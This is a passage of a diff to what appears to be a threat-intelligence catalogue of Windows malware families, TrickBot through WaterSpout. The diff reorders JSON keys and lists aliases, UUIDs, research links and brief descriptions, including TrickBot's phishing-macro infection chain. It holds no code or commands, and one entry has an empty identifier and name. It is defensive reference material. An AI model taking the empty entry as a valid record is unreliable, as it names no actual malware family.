derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed", "meta": { - "synonyms": [ - "Trickster", - "TheTrick", - "TrickLoader" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", @@ -14244,19 +14242,20 @@ "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" - ] + ], + "synonyms": [ + "Trickster", + "TheTrick", + "TrickLoader" + ], + "type": [] }, "uuid": "c824813c-9c79-4917-829a-af72529e8329", - "value": "TrickBot", - "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed" + "value": "TrickBot" }, { + "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.", "meta": { - "synonyms": [ - "Trisis", - "HatMan" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", "https://dragos.com/blog/trisis/TRISIS-01.pdf", @@ -14264,598 +14263,598 @@ "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN" - ] + ], + "synonyms": [ + "Trisis", + "HatMan" + ], + "type": [] }, "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", - "value": "win.triton", - "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers." + "value": "win.triton" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://github.com/5loyd/trochilus/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", - "value": "Trochilus RAT", - "description": "" + "value": "Trochilus RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Shade" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" - ] + ], + "synonyms": [ + "Shade" + ], + "type": [] }, "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", - "value": "Troldesh", - "description": "" + "value": "Troldesh" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb", - "value": "Trump Ransom", - "description": "" + "value": "Trump Ransom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", - "value": "Tsifiri", - "description": "" + "value": "Tsifiri" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", - "value": "TURNEDUP", - "description": "" + "value": "TURNEDUP" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", "https://www.lastline.com/labsblog/tyupkin-atm-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", - "value": "Tyupkin", - "description": "" + "value": "Tyupkin" }, { + "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.", "meta": { - "synonyms": [ - "Akagi" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", "https://github.com/hfiref0x/UACME" - ] + ], + "synonyms": [ + "Akagi" + ], + "type": [] }, "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", - "value": "UACMe", - "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors." + "value": "UACMe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns", "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", - "value": "UDPoS", - "description": "" + "value": "UDPoS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix", "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", - "value": "Uiwix", - "description": "" + "value": "Uiwix" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", - "value": "Unidentified 001", - "description": "" + "value": "Unidentified 001" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", - "value": "Unidentified 003", - "description": "" + "value": "Unidentified 003" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "", - "value": "", - "description": "" + "value": "" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", - "value": "Unidentified 006", - "description": "" + "value": "Unidentified 006" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware", "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", - "value": "Unidentified 013 (Korean)", - "description": "" + "value": "Unidentified 013 (Korean)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7", "https://wikileaks.org/ciav7p1/cms/page_34308128.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", - "value": "Unidentified 020 (Vault7)", - "description": "" + "value": "Unidentified 020 (Vault7)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", - "value": "Unidentified 022 (Ransom)", - "description": "" + "value": "Unidentified 022 (Ransom)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", - "value": "Unidentified 023", - "description": "" + "value": "Unidentified 023" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom", "https://twitter.com/malwrhunterteam/status/789161704106127360" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", - "value": "Unidentified 024 (Ransomware)", - "description": "" + "value": "Unidentified 024 (Ransomware)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud", "http://malware-traffic-analysis.net/2016/05/09/index.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f43a0e38-2394-4538-a123-4a0457096058", - "value": "Unidentified 025 (Clickfraud)", - "description": "" + "value": "Unidentified 025 (Clickfraud)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", - "value": "Unidentified 028", - "description": "" + "value": "Unidentified 028" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", - "value": "Unidentified 029", - "description": "" + "value": "Unidentified 029" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", "https://twitter.com/JaromirHorejsi/status/877811773826641920" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", - "value": "Filecoder", - "description": "" + "value": "Filecoder" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", - "value": "Unidentified 031", - "description": "" + "value": "Unidentified 031" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "799921d7-48e8-47a6-989e-487b527af37a", - "value": "Unidentified 032", - "description": "" + "value": "Unidentified 032" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", - "value": "Unidentified 033", - "description": "" + "value": "Unidentified 033" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_034", "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", - "value": "Unidentified 034", - "description": "" + "value": "Unidentified 034" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", - "value": "Unidentified 035", - "description": "" + "value": "Unidentified 035" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", - "value": "Unidentified 037", - "description": "" + "value": "Unidentified 037" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", - "value": "Unidentified 038", - "description": "" + "value": "Unidentified 038" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", - "value": "Unidentified 039", - "description": "" + "value": "Unidentified 039" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "88d70171-fc89-44d1-8931-035c0b095247", - "value": "Unidentified 041", - "description": "" + "value": "Unidentified 041" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042", "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", - "value": "Unidentified 042", - "description": "" + "value": "Unidentified 042" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", - "value": "Unidentified 044", - "description": "" + "value": "Unidentified 044" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", - "value": "Unidentified 045", - "description": "" + "value": "Unidentified 045" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", "https://twitter.com/DrunkBinary/status/1006534471687004160" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", - "value": "Unidentified 046", - "description": "" + "value": "Unidentified 046" }, { + "description": "RAT written in Delphi used by Patchwork APT.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", - "value": "Unidentified 047", - "description": "RAT written in Delphi used by Patchwork APT." + "value": "Unidentified 047" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", "https://twitter.com/DrunkBinary/status/1002587521073721346" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", - "value": "Unidentified 048 (Lazarus?)", - "description": "" + "value": "Unidentified 048 (Lazarus?)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049", "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", - "value": "Unidentified 049 (Lazarus/RAT)", - "description": "" + "value": "Unidentified 049 (Lazarus/RAT)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051", "https://twitter.com/CDA/status/1014144988454772736" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", - "value": "Unidentified 051", - "description": "" + "value": "Unidentified 051" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9", - "value": "Unidentified 052", - "description": "" + "value": "Unidentified 052" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053", "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", - "value": "Unidentified 053 (Wonknu?)", - "description": "" + "value": "Unidentified 053 (Wonknu?)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92", "https://twitter.com/struppigel/status/810753660737073153", "https://twitter.com/bartblaze/status/976188821078462465" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", - "value": "Unlock92", - "description": "" + "value": "Unlock92" }, { + "description": "", "meta": { - "synonyms": [ - "Rombrast" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", "https://twitter.com/ulexec/status/1005096227741020160" - ] + ], + "synonyms": [ + "Rombrast" + ], + "type": [] }, "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", - "value": "UPAS", - "description": "" + "value": "UPAS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", "https://secrary.com/ReversingMalware/Upatre/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", - "value": "Upatre", - "description": "" + "value": "Upatre" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", - "value": "Urausy", - "description": "" + "value": "Urausy" }, { + "description": "", "meta": { - "synonyms": [ - "Bebloh", - "Shiotob" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", @@ -14865,34 +14864,33 @@ "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" - ] + ], + "synonyms": [ + "Bebloh", + "Shiotob" + ], + "type": [] }, "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", - "value": "UrlZone", - "description": "" + "value": "UrlZone" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos" + ], "synonyms": [ "Snake" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos" - ] + "type": [] }, "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", - "value": "Uroburos", - "description": "" + "value": "Uroburos" }, { + "description": "", "meta": { - "synonyms": [ - "Catch", - "grabnew", - "NeverQuest" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", @@ -14900,190 +14898,190 @@ "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" - ] + ], + "synonyms": [ + "Catch", + "grabnew", + "NeverQuest" + ], + "type": [] }, "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", - "value": "Vawtrak", - "description": "" + "value": "Vawtrak" }, { + "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso", "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", - "value": "Velso Ransomware", - "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. " + "value": "Velso Ransomware" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker", "https://twitter.com/JaromirHorejsi/status/813690129088937984" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", - "value": "Venus Locker", - "description": "" + "value": "Venus Locker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", - "value": "Vermin", - "description": "" + "value": "Vermin" }, { + "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder", "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", - "value": "Vflooder", - "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect." + "value": "Vflooder" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor", "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4", - "value": "virdetdoor", - "description": "" + "value": "virdetdoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", - "value": "Virut", - "description": "" + "value": "Virut" }, { + "description": "", "meta": { - "synonyms": [ - "VMzeus", - "ZeusVM", - "Zberp" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" - ] + ], + "synonyms": [ + "VMzeus", + "ZeusVM", + "Zberp" + ], + "type": [] }, "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", - "value": "VM Zeus", - "description": "" + "value": "VM Zeus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", - "value": "Vobfus", - "description": "" + "value": "Vobfus" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", + "https://www.us-cert.gov/ncas/alerts/TA17-318B" + ], "synonyms": [ "FALLCHILL", "Manuscrypt" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", - "https://www.us-cert.gov/ncas/alerts/TA17-318B" - ] + "type": [] }, "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", - "value": "Volgmer", - "description": "" + "value": "Volgmer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi", "https://twitter.com/malware_traffic/status/821483557990318080" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", - "value": "Vreikstadi", - "description": "" + "value": "Vreikstadi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer", "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", "http://www.xylibox.com/2013/01/vskimmer.html", "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", - "value": "vSkimmer", - "description": "" + "value": "vSkimmer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times", "https://attack.mitre.org/wiki/Group/G0022" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", - "value": "w32times", - "description": "" + "value": "w32times" }, { + "description": "", "meta": { - "synonyms": [ - "Wcry", - "WannaCry", - "Wana Decrypt0r" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", @@ -15102,265 +15100,269 @@ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html" - ] + ], + "synonyms": [ + "Wcry", + "WannaCry", + "Wana Decrypt0r" + ], + "type": [] }, "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", - "value": "WannaCryptor", - "description": "" + "value": "WannaCryptor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer", "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367", - "value": "WaterMiner", - "description": "" + "value": "WaterMiner" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d238262a-4832-408f-9926-a7174e671b50", - "value": "WaterSpout", - "description": "" + "value": "WaterSpout" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", - "value": 